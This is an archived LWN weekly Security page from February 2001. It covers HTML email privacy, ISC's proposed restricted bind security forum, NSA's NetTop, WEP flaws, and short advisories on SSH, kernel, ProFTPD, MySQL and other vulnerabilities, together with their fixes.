Sections: Main page Security Kernel Distributions Development Commerce Linux in the news Announcements Linux History Letters All in one big page See also: last week's Security page.
|
SecurityNews and EditorialsPrivacy issues with HTML-based email. The Privacy Foundation has issued an advisory regarding potential security problems with HTML-based email containing Javascript code. When read by mail clients such as Netscape 6, Outlook or Outlook Express, javascript code included in a message can be used to silently report back to the original sender information such as to whom the message is forwarded or what additions are made to a forwarded message, potentially revealing sensitive information. This message from the politechbot.com mailing list provides a good summary of the issues involved, as well as links crediting the source of the security report. They sum it up pretty well, "Friends don't send friends HTML email". Note that not all HTML mail readers are affected. Some turn off Javascript by default while others automatically strip Javascript from messages before displaying them. Now is a good time to determine how your mail client handles such messages. ISC to close access to Bind security info?. Last week's reported security vulnerabilities in both bind 4 and bind 8 were followed this week by plans from ISC (the company who has been developing bind 9) to create a new "bind-members" forum for the discussion and dissemination of security information related to bind. Membership in this forum would be strictly limited, a nondisclosure agreement would be required, and a fee would be charged. Theo de Raadt forwarded (to Bugtraq) a copy of an email message from Paul Vixie at ISC that discusses the proposal. As you might expect, a large amount of furor and discussion resulted. Kurt Seifreid at SecurityPortal.com followed up on this issue with ISC and others. His article includes a brief email interview with Paul Vixie, who commented: An important point to make, if you're going to write about this, is that nothing ISC has historically done will stop. The code is still completely redistributable under the Berkeley-style license (which, unlike the GPL, allows vendors to distribute binaries based on modified sources without sharing those source modifications with ISC or anybody else). CERT will still be ISC's channel for announcing security bugs to the community. Patches will still be accepted from the community, and published to the community. The ONLY thing bind-members will do is ADD SOMETHING NEW.
The commentary in the article from Linux-Mandrake, Immunix OS, and others, though, is still uniformly negative towards this move. From our perspective, though we sympathize with ISC's need to develop a revenue stream based on this Open Source product, their suggested model strongly resembles the X Consortium model (which Paul Vixie references). We consider that a failed model. In spite of the inclusion of non-profit members without a fee, the X Consortium eventually bogged down in corporate politics, failing to deliver quality development upgrades and leaving a vacuum that the XFree86 group has happily stepped in to fill. In a similar manner, the bind-members group could result in timely information about potential security problems not getting out, or one vendor's fixes being delayed because fixes from other vendors were not yet available. Given the wide-spread use of bind across the Internet, this is a cause for much concern. If ISC is, indeed, planning on offering services to vendors that are in addition to what it already offers on public mailing lists, they should certainly be able to require a fee for that service. However, the need for a non-disclosure agreement along with that fee has not been demonstrated. For more coverage on this issue, check out our editorial on this week's front page. NSA attempting to design crack-proof computer (ZDNet). ZDNet looks at how VMWare and the National Security Agency have teamed up to make a more secure PC. "Called "NetTop," VMware's answer would turn each computer into a number of virtual PCs running on a Linux computer that would sit on each worker's desk. The security system would erect supposedly impenetrable, but virtual, walls between public data and more sensitive information on the same computer. " Note that VMWare on Linux was considered an avenue for this development while VMWare on Windows NT, etc., was not. Why? Because Linux provides the source code and Windows does not. NSA understands that they need the source code to be available to build a trusted system. NSA is therefore making a strong stand in support of Open Source, but not necessarily in support of Free Software. The article also discusses their plans to use commercial off-the-shelf software. Hopefully, closed source proprietary software will not be used while manipulating secure data ... otherwise, their exclusion of Microsoft's operating system will be meaningless. (Thanks to Richard Storey) Security of the WEP algorithm. Nikita Borisov, Ian Goldberg, and David Wagner have posted a whitepaper describing vulnerabilities they see in the Wired Equivalent Privacy (WEP) algorithm, part of the 802.11 standard. The potential for passive and active attacks to decrypt traffic are described, as well as one to inject new traffic. "Our analysis suggests that all of these attacks are practical to mount using only inexpensive off-the-shelf equipment. We recommend that anyone using an 802.11 wireless network not rely on WEP for security, and employ other security measures to protect their wireless network." Security ReportsSSH1 brute force password vulnerability. A potential vulnerability in SSH1 was reported this week involving the ability to brute force passwords due to the manner in which failed passwords are logged. A patch against ssh-1.2.30 is provided.SSH protocol 1.5 key session recovery vulnerability. A second SSH problem was reported this week, this time with the SSH protocol 1.5. This advisory describes the vulnerability, which can allow the session key for an exchange to be captured and then used to decrypt session packets. ssh-1 "up to" ssh-1.2.31 is reportedly vulnerable, presumably meaning that ssh-1.2.31 is also affected. ssh-2.4.0 and later is not impacted because the server key is regenerated for every connection. SSH.com deprecates the use of SSH1.OpenSSH "up to" 2.3.0 is also vulnerable. A patch has been introduced into the OpenSSH source tree. Updated versions of OpenSSH and portable OpenSSH (for non-OpenBSD systems) have not yet been announced; presumably they'll be made available soon. Linux kernel 2.4.1 denial-of-service vulnerability. A denial-of-service vulnerability has been reported in the Linux 2.4.1 kernel code. A patch for the problem is available and will be merged into the next prepatch for Linux 2.4.2. Distribution updates for the problem are unlikely to be seen, since most distributions have not yet begun shipping the new stable kernel series.XEmacs/gnuserv execution of arbitrary code. gnuserv is a client/server package included with XEmacs, but also available as a standalone package. Via gnuserv's support for MIT-MAGIC-COOKIE authentication, it can be exploited remotely to execute arbitrary code. gnuserv 3.12.1 resolves the problem and is included with XEmacs 21.1.14. Check BugTraq ID 2333 for more details.CUPS denial-of-service vulnerability. This is the second time we've seen reports of security problems in CUPS which appear to originate from Linux-Mandrake (e.g., no previous reports were seen on BugTraq or elsewhere). This time, a denial-of-service problem was reported that can be triggered via an extra-long input line. In addition, however, the Linux-Mandrake update apparently also includes other security-auditing steps, such as the replacement of sprintf calls with snprintf, strcpy with strncpy, etc., to better protect against other potential buffer overflows.
man -l format string vulnerability. A format string vulnerability in the man command was reported in its processing of the "-l" command line option. Note that not all versions of man provide the "-l" option. Only Debian and SuSE are reported to be affected, with varying results, due to varying permissions on the man binary. SuSE has confirmed the problem and promised an update soon. A bug report has been filed with Debian.Multiple vulnerabilities in ProFTPD. Three vulnerabilities in ProFTPD have been reported to BugTraq in the past month, according to this advisory from the ProFTPD development team. The vulnerabilities include a size memory leak, a USER memory link and format string vulnerabilities (links to the original reports are provided through the advisory). ProFTPD 1.2.0rc3 has now been released with fixes for all the above problems.
Sporadic reports of nmap crashing bind 9.1.0. Reports have been posted to BugTraq describing reproducible crashes of bind 9.1.0 caused by nmap. On the other hand, each of those reports has been followed by anecdotal evidence that 9.1.0 does not crash on all platforms and setups. So far, no one has pinpointed the cause of the crash in the 9.1.0 source code, so while there is a potential denial-of-service problem, it has not yet been confirmed.Infobot perl-based IRC bot remote execution of arbitrary command. A security problem has been reported with the Infobot perl-based IRC bot which could be exploited to run arbitrary files under the IRC bot user id. Disabling fortran math in the configuration file and restarting is a workaround for the vulnerability. No patch or update has been reported yet.cgi-bin scripts. The following cgi-bin scripts were reported to contain vulnerabilities:
Commercial products. The following commercial products were reported to contain vulnerabilities:
UpdatesMultiple vulnerabilities in bind 8.2.2 and bind 4. Check the February 1st LWN Security Summary for the initial reports. Bind 8.2.3 contains fixes for the problems with 8.2.2. Bind 4 fixes are also available, but an upgrade to bind 8 or even bind 9 is generally considered a preferable approach.This week's updates:
Previous updates:
MySQL buffer overflow. Check the January 25th LWN Security Summary or BugTraq ID 2262 for the original reports. This can be exploited remotely to gain access to the system under the uid of the mysql server. MySQL 3.23.31 and earlier are affected. MySQL 3.23.32 fixes the problem.This week's updates:
kdesu password sniffing vulnerability. The KDE "kdesu" utility has a vulnerability that can allow a local user to steal passwords; see the January 25 LWN Security Section for the initial report. This week's updates:
Multiple glibc vulnerabilities. Multiple glibc vulnerabilities have been reported in recent weeks in glibc. Since glibc updates generally address all the problems, rather than one specific problem, we are combining the update report for them. For the original reports, check the January 18th, 2001, LWN Security Report under the topics "glibc RESOLV_HOST_CONF preload vulnerability" and "glibc local write/ld.so.cache preload vulnerability". This week's updates: Previous updates:
exmh symlink vulnerability. Check the January 18th LWN Security Summary for the initial report.This week's updates:
ResourcesWilliam Stearns announced the latest version of his ramenfind script, for detecting and removing the Ramen worm.Osvaldo J. Filho posted a small patch to syslog which will log version requests for bind, helpful for noticing probes for the latest bind vulnerabilities. EventsUpcoming security events.
For additional security-related events, included training courses (which we don't list above) and events further in the future, check out Security Focus' calendar, one of the primary resources we use for building the above list. To submit an event directly to us, please send a plain-text message to lwn@lwn.net. Section Editor: Liz Coolbaugh |
February 8, 2001
LWN Resources | |||||||||||||||||||||||||||||